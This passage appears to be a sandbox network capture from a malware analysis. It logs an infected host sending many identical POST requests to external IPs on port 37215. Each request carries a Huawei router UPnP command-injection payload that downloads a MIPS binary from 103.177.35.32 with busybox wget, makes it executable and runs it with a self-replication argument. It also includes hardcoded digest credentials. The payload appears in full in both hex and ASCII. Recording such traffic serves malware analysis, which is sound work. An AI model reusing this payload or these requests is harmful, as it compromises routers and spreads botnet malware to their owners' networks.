                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        903192.168.2.233287441.71.31.18137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490308046 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        904192.168.2.2351532157.184.43.9237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490329027 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        905192.168.2.2335312157.194.139.11337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490339994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        906192.168.2.2349302197.89.59.11637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490348101 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        907192.168.2.2357230223.196.246.10437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490392923 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        908192.168.2.2347936156.174.211.18337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490397930 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        909192.168.2.2332852197.36.42.21837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490417957 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        910192.168.2.2333092197.190.127.24237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490417957 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        911192.168.2.2337688157.12.33.6037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.491363049 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        912192.168.2.2356464197.180.248.13837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.491369963 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
